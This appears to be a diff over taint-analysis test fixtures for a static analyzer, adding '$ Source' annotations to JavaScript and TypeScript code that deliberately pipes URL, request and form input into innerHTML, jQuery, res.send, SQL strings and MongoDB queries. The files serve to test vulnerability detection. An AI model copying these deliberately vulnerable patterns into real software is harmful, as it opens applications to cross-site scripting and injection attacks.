return function() { return window.location.search }; // $ Source
})
.factory("innocentSource_to_service", ["xssSinkService2", function(xssSinkService2) {
@@ -158,14 +158,14 @@ function angularJSServices() {
}
function testDOMParser() {
var target = document.location.search
var target = document.location.search // $ Source
var parser = new DOMParser();
parser.parseFromString(target, "application/xml"); // $ Alert
}
function references() {
var tainted = document.location.search;
var tainted = document.location.search; // $ Source
document.body.innerHTML = tainted; // $ Alert
@@ -178,7 +178,7 @@ function references() {
}
function react(){
var tainted = document.location.search;
var tainted = document.location.search; // $ Source
React.createElement("div", {dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert
React.createFactory("div")({dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert
@@ -266,7 +266,7 @@ function jqueryLocation() {
function testCreateContextualFragment() {
var tainted = window.name;
var tainted = window.name; // $ Source
var range = document.createRange();
range.selectNode(document.getElementsByTagName("div").item(0));
var documentFragment = range.createContextualFragment(tainted); // $ Alert
@@ -282,14 +282,14 @@ function flowThroughPropertyNames() {
function basicExceptions() {
try {
throw location;
throw location; // $ Source
} catch(e) {
$("body").append(e); // $ Alert
}
try {
try {
throw location
throw location // $ Source
} finally {}
} catch(e) {
$("body").append(e); // $ Alert
@@ -308,7 +308,7 @@ function test2() {
}
function getTaintedUrl() {
return new URL(document.location);
return new URL(document.location); // $ Source
}
function URLPseudoProperties() {
@@ -322,21 +322,21 @@ function URLPseudoProperties() {
function hash() {
function getUrl() {
return new URL(document.location);
return new URL(document.location); // $ Source
}
$(getUrl().hash.substring(1)); // $ Alert
}
function growl() {
var target = document.location.search
var target = document.location.search // $ Source
$.jGrowl(target); // $ Alert
}
function thisNodes() {
var pluginName = "myFancyJQueryPlugin";
var myPlugin = function () {
var target = document.location.search
var target = document.location.search // $ Source
this.html(target); // $ Alert - this is a jQuery object
this.innerHTML = target // OK - this is a jQuery object
@@ -352,7 +352,7 @@ function thisNodes() {
}
function test() {
var target = document.location.search
var target = document.location.search // $ Source
$('myId').html(target) // $ Alert
@@ -361,7 +361,7 @@ function test() {
}
function test() {
var target = document.location.search
var target = document.location.search // $ Source
$('myId').html(target); // $ Alert
@@ -371,7 +371,7 @@ function test() {
target.taint2 = 2;
$('myId').html(target.taint2);
target.taint3 = document.location.search;
target.taint3 = document.location.search; // $ Source
$('myId').html(target.taint3); // $ Alert
target.sub.taint4 = 2
@@ -396,10 +396,10 @@ function test() {
}
function hash2() {
var payload = window.location.hash.substr(1);
var payload = window.location.hash.substr(1); // $ Source
document.write(payload); // $ Alert
let match = window.location.hash.match(/hello (\w+)/);
let match = window.location.hash.match(/hello (\w+)/); // $ Source
if (match) {
document.write(match[1]); // $ Alert
}
@@ -408,7 +408,7 @@ function hash2() {
}
function nonGlobalSanitizer() {
var target = document.location.search
var target = document.location.search // $ Source
$("#foo").html(target.replace(/<metadata>[\s\S]*<\/metadata>/, '<metadata></metadata>')); // $ Alert
@@ -416,7 +416,7 @@ function nonGlobalSanitizer() {
}
function mootools(){
var source = document.location.search;
var source = document.location.search; // $ Source
new Element("div");
new Element("div", {text: source});
@@ -433,14 +433,14 @@ const Convert = require('ansi-to-html');
const ansiToHtml = new Convert();
function ansiToHTML() {
var source = document.location.search;
var source = document.location.search; // $ Source
$("#foo").html(source); // $ Alert
$("#foo").html(ansiToHtml.toHtml(source)); // $ Alert
}
function domMethods() {
var source = document.location.search;
var source = document.location.search; // $ Source
let table = document.getElementById('mytable');
table.innerHTML = source; // $ Alert
@@ -451,7 +451,7 @@ function domMethods() {
}
function urlStuff() {
var url = document.location.search.substr(1);
var url = document.location.search.substr(1); // $ Source
$("<a>", {href: url}).appendTo("body"); // $ Alert
$("#foo").attr("href", url); // $ Alert
@@ -488,7 +488,7 @@ function Foo() {
}
function nonGlobalSanitizer() {
var target = document.location.search
var target = document.location.search // $ Source
$("#foo").html(target.replace(new RegExp("<|>"), '')); // $ Alert
$("#foo").html(target.replace(new RegExp("<|>", unknownFlags()), '')); // OK - most likely good. We don't know what the flags are.
$("#foo").html(target.replace(new RegExp("<|>", "g"), ''));

@@ -1,5 +1,5 @@
var foo = document.getElementById("foo");
var data = JSON.parse(decodeURIComponent(window.location.search.substr(1)));
var data = JSON.parse(decodeURIComponent(window.location.search.substr(1))); // $ Source
foo.setAttribute("src", data.src); // $ Alert
foo.setAttribute("HREF", data.p); // $ Alert

@@ -17,7 +17,7 @@
{
name: 'dashboards',
source: function (query, cb) {
var target = document.location.search
var target = document.location.search // $ Source
cb(target);
},
templates: {

@@ -1,5 +1,5 @@
function test() {
let tainted = document.location.search;
let tainted = document.location.search; // $ Source
$("<div>" + tainted + "</div>"); // $ Alert
$(`<div>${tainted}</div>`); // $ Alert

@@ -1,5 +1,5 @@
function test(elt) {
var tainted = document.location.search.substring(1);
var tainted = document.location.search.substring(1); // $ Source
WinJS.Utilities.setInnerHTMLUnsafe(elt, tainted); // $ Alert
WinJS.Utilities.setOuterHTMLUnsafe(elt, tainted); // $ Alert
}

@@ -1,5 +1,5 @@
(function () {
var foo = document.location;
var foo = document.location; // $ Source
function inner(x) {
unknown(x);
@@ -114,7 +114,7 @@ var app = express();
app.get('/user/:id', function (req, res) {
try {
unknown(req.params.id);
unknown(req.params.id); // $ Source
} catch (e) {
res.send("Exception: " + e); // $ Alert
}
@@ -122,7 +122,7 @@ app.get('/user/:id', function (req, res) {
(function () {
sessionStorage.setItem('exceptionSession', document.location.search);
sessionStorage.setItem('exceptionSession', document.location.search); // $ Source
try {
unknown(sessionStorage.getItem('exceptionSession'));
@@ -133,7 +133,7 @@ app.get('/user/:id', function (req, res) {
app.get('/user/:id', function (req, res) {
unknown(req.params.id, (error, res) => {
unknown(req.params.id, (error, res) => { // $ Source
if (error) {
$('myId').html(error); // $ Alert
return;
@@ -143,7 +143,7 @@ app.get('/user/:id', function (req, res) {
});
(function () {
var foo = document.location.search;
var foo = document.location.search; // $ Source
new Promise(resolve => unknown(foo, resolve)).catch((e) => {
$('myId').html(e); // $ Alert
@@ -177,7 +177,7 @@ app.get('/user/:id', function (req, res) {
})();
app.get('/user/:id', function (req, res) {
unknown(req.params.id, (error, res) => {
unknown(req.params.id, (error, res) => { // $ Source
if (error) {
$('myId').html(error); // $ Alert
}

@@ -60,7 +60,7 @@ app.get('/user/:id', function (req, res) {
.use(doc, { title: '👋🌍' })
.use(format)
.use(html)
.process(req.body, function (err, file) {
.process(req.body, function (err, file) { // $ Source
res.send(file); // $ Alert
});
@@ -70,7 +70,7 @@ app.get('/user/:id', function (req, res) {
res.send(unified().use(markdown).processSync(req.body).toString); // $ Alert
remark().process(req.body, (e, f) => {
remark().process(req.body, (e, f) => { // $ Source
res.send(f); // $ Alert
})
});
@@ -110,9 +110,9 @@ hapi.route({
}});
app.get("invalid/keys/:id", async (req, res) => {
const { keys: queryKeys } = req.query;
const { keys: queryKeys } = req.query; // $ Source
const paramKeys = req.params;
const keys = queryKeys || paramKeys?.keys;
const keys = queryKeys || paramKeys?.keys; // $ Source
const keyArray = typeof keys === 'string' ? [keys] : keys;
const invalidKeys = keyArray.filter(key => !whitelist.includes(key));

@@ -132,7 +132,7 @@ function escapeHtml4(s) {
}
app.get('/user/:id', function (req, res) {
const url = req.params.id;
const url = req.params.id; // $ Source
res.send(escapeHtml1(url));
res.send(escapeHtml2(url));

@@ -6,7 +6,7 @@ app.get("/some/path", (req, res) => {
let response = "Hello, world!";
if(req.query.jsonp && isVarName(req.query.jsonp))
response = req.query.jsonp + "(" + response + ")";
response = req.query.jsonp + "(" + response + ")"; // $ Source
res.send(response); // $ Alert
});

@@ -1,7 +1,7 @@
var express = require('express');
express().get('/user/', function(req, res) {
var evil = req.query.evil;
var evil = req.query.evil; // $ Source
res.send(console.log("<div>%s</div>", evil)); // OK - returns undefined
res.send(util.format("<div>%s</div>", evil)); // $ Alert
res.send(require("printf")("<div>%s</div>", evil)); // $ Alert

@@ -1,13 +1,13 @@
var liveServer = require("live-server");
const middleware = [function(req, res, next) {
const tainted = req.url;
const tainted = req.url; // $ Source
res.end(`<html><body>${tainted}</body></html>`); // $ Alert
}];
middleware.push(function(req, res, next) {
const tainted = req.url;
const tainted = req.url; // $ Source
res.end(`<html><body>${tainted}</body></html>`); // $ Alert
});

@@ -10,7 +10,7 @@ app.get("/some/path", (req, res) => {
res.send(x + y); // $ Alert
}
let callback = sendResponse.bind(null, req.url);
let callback = sendResponse.bind(null, req.url); // $ Source
[1, 2, 3].forEach(callback);
});
@@ -19,7 +19,7 @@ app.get("/underscore", (req, res) => {
res.send(x + y); // $ Alert
}
let callback = underscore.partial(sendResponse, req.url);
let callback = underscore.partial(sendResponse, req.url); // $ Source
[1, 2, 3].forEach(callback);
});
@@ -28,7 +28,7 @@ app.get("/lodash", (req, res) => {
res.send(x + y); // $ Alert
}
let callback = lodash.partial(sendResponse, req.url);
let callback = lodash.partial(sendResponse, req.url); // $ Source
[1, 2, 3].forEach(callback);
});
@@ -37,7 +37,7 @@ app.get("/ramda", (req, res) => {
res.send(x + y); // $ Alert
}
let callback = R.partial(sendResponse, [req.url]);
let callback = R.partial(sendResponse, [req.url]); // $ Source
[1, 2, 3].forEach(callback);
});

@@ -2,7 +2,7 @@ let express = require('express');
let app = express();
app.get("/some/path", (req, res) => {
new Promise((resolve, reject) => resolve(req.query.data))
new Promise((resolve, reject) => resolve(req.query.data)) // $ Source
.then(x => res.send(x)); // $ Alert
new Promise((resolve, reject) => resolve(req.query.data))

@@ -3,7 +3,7 @@ var express = require('express');
var app = express();
app.get('/user/:id', function(req, res) {
let { p, q: r } = req.params;
let { p, q: r } = req.params; // $ Source
res.send(p); // $ Alert
res.send(r); // $ Alert
});
@@ -11,7 +11,7 @@ app.get('/user/:id', function(req, res) {
const aKnownValue = "foo";
app.get('/bar', function(req, res) {
let { p } = req.params;
let { p } = req.params; // $ Source
if (p == aKnownValue)
res.send(p);
@@ -27,7 +27,7 @@ app.get('/bar', function(req, res) {
const clone = require('clone');
app.get('/baz', function(req, res) {
let { p } = req.params;
let { p } = req.params; // $ Source
var obj = {};
obj.p = p;
@@ -40,7 +40,7 @@ app.get('/baz', function(req, res) {
const serializeJavaScript = require('serialize-javascript');
app.get('/baz', function(req, res) {
let { p } = req.params;
let { p } = req.params; // $ Source
var serialized = serializeJavaScript(p);
@@ -54,7 +54,7 @@ app.get('/baz', function(req, res) {
const fclone = require('fclone');
app.get('/baz', function(req, res) {
let { p } = req.params;
let { p } = req.params; // $ Source
var obj = {};
obj.p = p;
@@ -66,7 +66,7 @@ app.get('/baz', function(req, res) {
const jc = require('json-cycle');
app.get('/baz', function(req, res) {
let { p } = req.params;
let { p } = req.params; // $ Source
var obj = {};
obj.p = p;
@@ -79,7 +79,7 @@ app.get('/baz', function(req, res) {
const sortKeys = require('sort-keys');
app.get('/baz', function(req, res) {
let { p } = req.params;
let { p } = req.params; // $ Source
var obj = {};
obj.p = p;

@@ -2,12 +2,12 @@ var express = require('express');
var app = express();
app.enable('x-powered-by').disable('x-powered-by').get('/', function (req, res) {
let { p } = req.params;
let { p } = req.params; // $ Source
res.send(p); // $ Alert
});
const prettier = require("prettier");
app.post("foobar", function (reg, res) {
const code = prettier.format(reg.body, { semi: false, parser: "babel" });
const code = prettier.format(reg.body, { semi: false, parser: "babel" }); // $ Source
res.send(code); // $ Alert
});

@@ -4,7 +4,7 @@ var fs = require('fs');
var express = require('express');
express().get('/', function(req, res) {
fs.readdir("/myDir", function (error, files1) {
fs.readdir("/myDir", function (error, files1) { // $ Source
res.send(files1); // $ Alert
});
});
@@ -22,7 +22,7 @@ http.createServer(function (req, res) {
return files3.join('');
}
fs.readdir("/myDir", function (error, files1) {
fs.readdir("/myDir", function (error, files1) { // $ Source
res.write(files1); // $ Alert
var dirs = [];

@@ -3,6 +3,6 @@ const parseTorrent = require('parse-torrent'),
express().get('/user/:id', function(req, res) {
let torrent = parseTorrent(unknown),
name = torrent.name;
name = torrent.name; // $ Source
res.send(name); // $ Alert
});

@@ -8,7 +8,7 @@
$("<span>" + $.trim("foo") + "</span>");
}));
$.fn.myPlugin = function (stuff, options) {
$.fn.myPlugin = function (stuff, options) { // $ Source
$("#foo").html("<span>" + options.foo + "</span>"); // $ Alert
$("#foo").html("<span>" + stuff + "</span>"); // $ Alert

@@ -1,4 +1,4 @@
export function trivialXss(s: string) {
export function trivialXss(s: string) { // $ Source
const html = "<span>" + s + "</span>"; // $ Alert
document.querySelector("#html").innerHTML = html;
}

@@ -1,9 +1,9 @@
export function trivialXss(s: string) {
export function trivialXss(s: string) { // $ Source
const html = "<span>" + s + "</span>"; // $ Alert - this file is recognized as a main file.
document.querySelector("#html").innerHTML = html;
}
export function objectStuff(settings: any, i: number) {
export function objectStuff(settings: any, i: number) { // $ Source
document.querySelector("#html").innerHTML = "<span>" + settings + "</span>"; // $ Alert
var name;

@@ -1,4 +1,4 @@
export function trivialXss(s: string) {
export function trivialXss(s: string) { // $ Source
const html = "<span>" + s + "</span>"; // $ Alert - this file is not recognized as a main file.
document.querySelector("#html").innerHTML = html;
}

@@ -1,14 +1,14 @@
module.exports.xssThroughHTMLConstruction = function (s) {
module.exports.xssThroughHTMLConstruction = function (s) { // $ Source
const html = "<span>" + s + "</span>";// $ Alert
document.querySelector("#html").innerHTML = html;
}
module.exports.xssThroughXMLParsing = function (s) {
module.exports.xssThroughXMLParsing = function (s) { // $ Source
const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert
document.querySelector("#xml").appendChild(doc.documentElement);
}
module.exports.xssThroughMoreComplexXMLParsing = function (s) {
module.exports.xssThroughMoreComplexXMLParsing = function (s) { // $ Source
const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert
const xml = doc.documentElement;
@@ -18,7 +18,7 @@ module.exports.xssThroughMoreComplexXMLParsing = function (s) {
}
const markdown = require('markdown-it')({html: true});
module.exports.xssThroughMarkdown = function (s) {
module.exports.xssThroughMarkdown = function (s) { // $ Source
const html = markdown.render(s); // $ Alert
document.querySelector("#markdown").innerHTML = html;
}
@@ -53,7 +53,7 @@ module.exports.createsClass = function (s) {
return new Foo(s);
}
$.fn.xssPlugin = function (options) {
$.fn.xssPlugin = function (options) { // $ Source
const defaults = {
name: "name"
};
@@ -63,7 +63,7 @@ $.fn.xssPlugin = function (options) {
});
}
module.exports.guards = function (attrVal) {
module.exports.guards = function (attrVal) { // $ Source
document.querySelector("#id").innerHTML = "<img alt=\"" + attrVal + "\"/>"; // $ Alert
document.querySelector("#id").innerHTML = "<img alt=\"" + attrVal.replace(/"|'/g, "") + "\"/>";
if (attrVal.indexOf("\"") === -1 && attrVal.indexOf("'") === -1) {
@@ -76,7 +76,7 @@ module.exports.intentionalTemplate = function (obj) {
document.querySelector("#template").innerHTML = html;
}
module.exports.types = function (val) {
module.exports.types = function (val) { // $ Source
if (typeof val === "string") {
$("#foo").html("<span>" + val + "</span>"); // $ Alert
} else if (typeof val === "number") {
@@ -90,12 +90,12 @@ function createHTML(x) {
return "<span>" + x + "</span>"; // $ Alert
}
module.exports.usesCreateHTML = function (x) {
module.exports.usesCreateHTML = function (x) { // $ Source
$("#foo").html(createHTML(x));
}
const myMermaid = require('mermaid');
module.exports.usesCreateHTML = function (x) {
module.exports.usesCreateHTML = function (x) { // $ Source
myMermaid.render("id", x, function (svg) { // $ Alert
$("#foo").html(svg);
});
@@ -113,7 +113,7 @@ module.exports.usesCreateHTML = function (x) {
});
}
module.exports.xssThroughMarkdown = function (s) {
module.exports.xssThroughMarkdown = function (s) { // $ Source
const html = markdown.render(s); // $ Alert
document.querySelector("#markdown").innerHTML = html;
}

@@ -1,9 +1,9 @@
export function basicHtmlConstruction(s: string) {
export function basicHtmlConstruction(s: string) { // $ Source
const html = "<span>" + s + "</span>"; // $ Alert
document.body.innerHTML = html;
}
export function insertIntoCreatedDocument(s: string) {
export function insertIntoCreatedDocument(s: string) { // $ Source
const newDoc = document.implementation.createHTMLDocument("");
newDoc.body.innerHTML = "<span>" + s + "</span>"; // $ SPURIOUS: Alert - inserted into document disconnected from the main DOM.
}

@@ -1,5 +1,5 @@
(function(){
$.fn.my_plugin = function my_plugin(options) {
$.fn.my_plugin = function my_plugin(options) { // $ Source
$(options); // $ Alert - or is it?
$(options.target); // $ Alert
@@ -62,18 +62,18 @@
};
$.fn.my_plugin = function my_plugin(element, options) {
$.fn.my_plugin = function my_plugin(element, options) { // $ Source
this.$element = $(element);
this.options = $.extend({}, options);
if (this.options.parent) this.$parent = $(this.options.parent) // $ Alert
};
$.fn.my_plugin = function my_plugin(options) {
$.fn.my_plugin = function my_plugin(options) { // $ Source
$(options.foo.bar.baz); // $ Alert
$(options.html);
};
$.fn.my_plugin = function my_plugin(options) {
$.fn.my_plugin = function my_plugin(options) { // $ Source
$(x).appendTo(options.foo.bar.baz); // $ Alert
};
@@ -81,7 +81,7 @@
$("#" + options.target);
};
$.fn.my_plugin = function my_plugin(options) {
$.fn.my_plugin = function my_plugin(options) { // $ Source
function f(o) {
this.o = $.extend({}, o);
var t = this.o.target;
@@ -98,7 +98,7 @@
$(target);
};
$.fn.my_plugin = function my_plugin(options) {
$.fn.my_plugin = function my_plugin(options) { // $ Source
options = $.extend({
menu: '<div></div>',
target: '.my_plugin'
@@ -111,28 +111,28 @@
menu: '<div></div>',
target: '.my_plugin'
};
$.fn.my_plugin = function my_plugin(options) {
$.fn.my_plugin = function my_plugin(options) { // $ Source
options = $.extend({}, $.fn.my_plugin.defaults, options);
$(options.menu);
$(options.target); // $ Alert
};
var pluginName = "my_plugin";
$.fn[pluginName] = function my_plugin(options) {
$.fn[pluginName] = function my_plugin(options) { // $ Source
$(options.target); // $ Alert
};
$.extend($.fn, {
my_plugin: function my_plugin(options) {
my_plugin: function my_plugin(options) { // $ Source
$(options.target); // $ Alert
}
});
$.fn.affix = function my_plugin(options) {
$.fn.affix = function my_plugin(options) { // $ Source
$(options.target); // $ Alert
};
$.fn.tooltip = function my_plugin(options) {
$.fn.tooltip = function my_plugin(options) { // $ Source
$(options.viewport.selector); // $ Alert
};
@@ -150,14 +150,14 @@
$(unintentional); // OK - but should be flagged by another query
}
$.fn.my_plugin = function my_plugin(options) {
$.fn.my_plugin = function my_plugin(options) { // $ Source
let target = options.target;
target === DEFAULTS.target? $(target): $(document).find(target);
options.target === DEFAULTS.target? $(options.target): $(document).find(options.target);
options.targets.a === DEFAULTS.target? $(options.target.a): $(document).find(options.target.a); // $ SPURIOUS: Alert - should be sanitized by `MembershipTestSanitizer` - but still flagged because `AccessPath` can't handle these deeply nested properties
}
$.fn.my_plugin = function my_plugin(options) {
$.fn.my_plugin = function my_plugin(options) { // $ Source
$(anyPrefix + options.target); // OK - unlikely to be a html/css prefix confusion
$(something.replace("%PLACEHOLDER%", options.target)); // OK - (unlikely to be a html/css prefix confusion);
@@ -175,14 +175,14 @@
function setupPlugin(o) {
$.fn.my_plugin = o.f
}
setupPlugin({f: function(options) {
setupPlugin({f: function(options) { // $ Source
$(options.target); // $ Alert
}});
setupPlugin({f:function(options) {
$(document).find(options.target);
}});
$.fn.position = function( options ) {
$.fn.position = function( options ) { // $ Source
if ( !options || !options.of ) {
return doSomethingElse( this, arguments );
}

@@ -9,7 +9,7 @@ import { NgForm } from "@angular/forms";
`
})
export class Foo {
field: string = "";
field: string = ""; // $ Source
safeField: string = "";
setInput1(event) {

@@ -5,10 +5,10 @@ const FormikBasic = () => (
<div>
<Formik
initialValues={{ email: '', password: '' }}
validate={values => {
validate={values => { // $ Source
$("#id").html(values.foo); // $ Alert
}}
onSubmit={(values, { setSubmitting }) => {
onSubmit={(values, { setSubmitting }) => { // $ Source
$("#id").html(values.bar); // $ Alert
}}
>
@@ -21,17 +21,17 @@ const FormikBasic = () => (
const FormikEnhanced = withFormik({
mapPropsToValues: () => ({ name: '' }),
validate: values => {
validate: values => { // $ Source
$("#id").html(values.email); // $ Alert
},
handleSubmit: (values, { setSubmitting }) => {
handleSubmit: (values, { setSubmitting }) => { // $ Source
$("#id").html(values.email); // $ Alert
}
})(MyForm);
(function () {
const { values, submitForm } = useFormikContext();
const { values, submitForm } = useFormikContext(); // $ Source
$("#id").html(values.email); // $ Alert
$("#id").html(submitForm.email);
@@ -41,7 +41,7 @@ import { Form } from 'react-final-form'
const App = () => (
<Form
onSubmit={async values => {
onSubmit={async values => { // $ Source
$("#id").html(values.stooge); // $ Alert
}}
initialValues={{ stooge: 'larry', employed: false }}
@@ -68,7 +68,7 @@ import { useForm } from 'react-hook-form';
function HookForm() {
const { register, handleSubmit, errors } = useForm(); // initialize the hook
const onSubmit = (data) => {
const onSubmit = (data) => { // $ Source
$("#id").html(data.name); // $ Alert
};
@@ -89,7 +89,7 @@ function HookForm2() {
<button
type="button"
onClick={() => {
const values = getValues(); // { test: "test-input", test1: "test1-input" }
const values = getValues(); // $ Source - { test: "test-input", test1: "test1-input" }
$("#id").html(values.name); // $ Alert
}}
>

@@ -70,7 +70,7 @@
$.jGrowl($("input").get(0).name); // $ Alert
let selector = $("input").get(0).name;
let selector = $("input").get(0).name; // $ Source
if (something()) {
selector = $("textarea").val || ''
}
@@ -81,7 +81,7 @@
$("#id").html( $('#foo').prop('innerText') ); // $ Alert
const anser = require("anser");
const text = $("text").text();
const text = $("text").text(); // $ Source
$("#id").html(anser.ansiToHtml(text)); // $ Alert
$("#id").html(new anser().process(text)); // $ Alert
@@ -111,7 +111,7 @@ class Sub extends Super {
}
(function () {
const src = document.getElementById("#link").src;
const src = document.getElementById("#link").src; // $ Source
$("#id").html(src); // $ Alert
$("#id").attr("src", src);
@@ -127,7 +127,7 @@ class Sub extends Super {
let elem = document.createElement('a');
const wSelection = getSelection();
const dSelection = document.getSelection();
let linkText = wSelection.toString() || dSelection.toString() || '';
let linkText = wSelection.toString() || dSelection.toString() || ''; // $ Source
elem.innerHTML = linkText; // $ Alert
$("#id").html(linkText); // $ Alert
elem.innerText = linkText;
@@ -136,7 +136,7 @@ class Sub extends Super {
const cashDom = require("cash-dom");
(function () {
const src = document.getElementById("#link").src;
const src = document.getElementById("#link").src; // $ Source
cash("#id").html(src); // $ Alert
cashDom("#id").html(src); // $ Alert
@@ -156,7 +156,7 @@ const cashDom = require("cash-dom");
},
};
VeryUniqueXssTestName.send($("textarea").val());
VeryUniqueXssTestName.send($("textarea").val()); // $ Source
}
foo()
})();

@@ -1,7 +1,7 @@
const mysql = require('mysql');
const pool = mysql.createPool(getConfig());
let temp = process.env['foo'];
let temp = process.env['foo']; // $ Source
pool.getConnection(function(err, connection) {
connection.query({
sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // $ Alert

@@ -10,7 +10,7 @@ let app = express();
app.use(bodyParser.json());
app.post("/find", (req, res) => {
let v = JSON.parse(req.body.x);
let v = JSON.parse(req.body.x); // $ Source
getCollection().find({ id: v }); // $ Alert
});
@@ -18,7 +18,7 @@ import * as mongoose from "mongoose";
declare function getMongooseModel(): mongoose.Model;
declare function getMongooseQuery(): mongoose.Query;
app.post("/find", (req, res) => {
let v = JSON.parse(req.body.x);
let v = JSON.parse(req.body.x); // $ Source
getMongooseModel().find({ id: v }); // $ Alert
getMongooseQuery().find({ id: v }); // $ Alert
});

@@ -5,7 +5,7 @@ import { Octokit } from "@octokit/core";
const kit = new Octokit();
app.get('/post/:id', function(req, res) {
const id = req.params.id;
const id = req.params.id; // $ Source
const response = kit.graphql(`
query {
repository(owner: "github", name: "${id}") {
@@ -22,7 +22,7 @@ app.get('/post/:id', function(req, res) {
import { graphql, withCustomRequest } from "@octokit/graphql";
app.get('/user/:id/', function(req, res) {
const id = req.params.id;
const id = req.params.id; // $ Source
const response = graphql(`foo ${id}`); // $ Alert
const myGraphql = withCustomRequest(request);
@@ -35,7 +35,7 @@ app.get('/user/:id/', function(req, res) {
const { request } = require("@octokit/request");
app.get('/article/:id/', async function(req, res) {
const id = req.params.id;
const id = req.params.id; // $ Source
const result = await request("POST /graphql", {
headers: {
authorization: "token 0000000000000000000000000000000000000001",
@@ -51,7 +51,7 @@ import { Octokit as Core } from "@octokit/rest";
const kit2 = new Core();
app.get('/event/:id/', async function(req, res) {
const id = req.params.id;
const id = req.params.id; // $ Source
const result = await kit2.graphql(`foo ${id}`); // $ Alert
const result2 = await kit2.request("POST /graphql", { query: `foo ${id}` }); // $ Alert
@@ -70,7 +70,7 @@ var root = {
};
app.get('/thing/:id', async function(req, res) {
const id = req.query.id;
const id = req.query.id; // $ Source
const result = await nativeGraphql(schema, "{ foo" + id + " }", root); // $ Alert
fetch("https://my-grpahql-server.com/graphql", {
@@ -114,6 +114,6 @@ const github = require('@actions/github');
app.get('/event/:id/', async function(req, res) {
const kit = github.getOctokit("foo")
const id = req.params.id;
const id = req.params.id; // $ Source
const result = await kit.graphql(`foo ${id}`); // $ Alert
});

@@ -10,7 +10,7 @@ const connection = mysql.createConnection({
database: 'test'
});
app.use(route.get('/test1', (context, param1) => {
app.use(route.get('/test1', (context, param1) => { // $ Source
param1 = xss(param1)
connection.query(
`SELECT * FROM \`table\` WHERE \`name\` =` + param1, // $ Alert

@@ -22,7 +22,7 @@ app.post('/documents/find', (req, res) => {
MongoClient.connect('mongodb://localhost:27017/test', (err, db) => {
let doc = db.collection('doc');
const query = JSON.parse(req.query.data);
const query = JSON.parse(req.query.data); // $ Source
if (checkSchema(query)) {
doc.find(query);
}
@@ -47,7 +47,7 @@ app.post('/documents/insert', (req, res) => {
MongoClient.connect('mongodb://localhost:27017/test', async (err, db) => {
let doc = db.collection('doc');
const query = JSON.parse(req.query.data);
const query = JSON.parse(req.query.data); // $ Source
const validate = joiSchema.validate(query);
if (!validate.error) {
doc.find(query);

@@ -2,7 +2,7 @@ const Router = require('koa-router')
const {Sequelize} = require("sequelize");
new Router().get("/hello", (ctx) => {
const { version } = ctx.query;
const { version } = ctx.query; // $ Source
if (version && validVersion(version) === false) {
throw new Error(`invalid version ${version}`);

@@ -17,7 +17,7 @@ const sanitizeInput = function (input) {
};
const server = http.createServer((req, res) => {
let q = url.parse(req.url, true);
let q = url.parse(req.url, true); // $ Source
let username = q.query.username;

@@ -8,7 +8,7 @@ app.use(bodyParser.urlencoded({ extended: true }));
app.post("/documents/find", (req, res) => {
const query = {};
query.title = req.body.title;
query.title = req.body.title; // $ Source
db.myDoc.find(query, (err, data) => {}); // $ Alert - query is tainted by user-provided object value
});

@@ -10,7 +10,7 @@ app.use(bodyParser.urlencoded({ extended: true }));
app.post("/documents/find", (req, res) => {
const query = {};
query.title = req.body.title;
query.title = req.body.title; // $ Source
doc.find(query, (err, data) => {}); // $ Alert - query is tainted by user-provided object value
});

@@ -12,7 +12,7 @@ app.use(bodyParser.urlencoded({ extended: true }));
app.post("/documents/find", (req, res) => {
const query = {};
query.title = req.body.title;
query.title = req.body.title; // $ Source
doc.find(query); // $ Alert - query is tainted by user-provided object value
});

@@ -10,7 +10,7 @@ app.use(bodyParser.urlencoded({ extended: true }));
app.post('/documents/find', (req, res) => {
const query = {};
query.title = req.body.title;
query.title = req.body.title; // $ Source
MongoClient.connect('mongodb://localhost:27017/test', (err, db) => {
let doc = db.collection('doc');
@@ -22,7 +22,7 @@ app.post('/documents/find', (req, res) => {
// OK - throws unless user-data is a string
doc.find({ title: query.body.title.substr(1) });
let title = req.body.title;
let title = req.body.title; // $ Source
if (typeof title === "string") {
// OK - input checked to be a string
doc.find({ title: title });
@@ -44,7 +44,7 @@ app.get('/:id', (req, res) => {
app.post('/documents/find', (req, res) => {
const query = {};
query.title = req.query.title;
query.title = req.query.title; // $ Source
MongoClient.connect('mongodb://localhost:27017/test', (err, db) => {
let doc = db.collection('doc');
@@ -54,7 +54,7 @@ app.post('/documents/find', (req, res) => {
app.post('/documents/find', (req, res) => {
const query = {};
query.title = req.query.title;
query.title = req.query.title; // $ Source
MongoClient.connect('mongodb://localhost:27017/test', (err, client) => {
let doc = client.db("MASTER").collection('doc');
@@ -63,7 +63,7 @@ app.post('/documents/find', (req, res) => {
});
app.post("/logs/count-by-tag", (req, res) => {
let tag = req.query.tag;
let tag = req.query.tag; // $ Source
MongoClient.connect(process.env.DB_URL, {}, (err, client) => {
client
@@ -98,7 +98,7 @@ app.post('/documents/find', (req, res) => {
});
function useQuery(queries) {
const query = {};
query.title = queries.title;
query.title = queries.title; // $ Source
MongoClient.connect('mongodb://localhost:27017/test', (err, db) => {
let doc = db.collection('doc');

@@ -21,7 +21,7 @@ app.post('/documents/find', (req, res) => {
app.post('/documents/find', (req, res) => {
const query = {};
query.title = req.query.title;
query.title = req.query.title; // $ Source
MongoClient.connect('mongodb://localhost:27017/test', (err, db) => {
let doc = db.collection('doc');

@@ -18,7 +18,7 @@ const Document = Mongoose.model('Document', {
app.post('/documents/find', (req, res) => {
const query = {};
query.title = req.body.title;
query.title = req.body.title; // $ Source
Document.aggregate([query]); // $ Alert - query is tainted by user-provided object value
@@ -98,7 +98,7 @@ app.post('/documents/find', (req, res) => {
Document.findOneAndUpdate(X, query, function () { }); // $ Alert
let id = req.query.id, cond = req.query.cond;
let id = req.query.id, cond = req.query.cond; // $ Source
Document.deleteMany(cond); // $ Alert
Document.deleteOne(cond); // $ Alert
Document.geoSearch(cond); // $ Alert
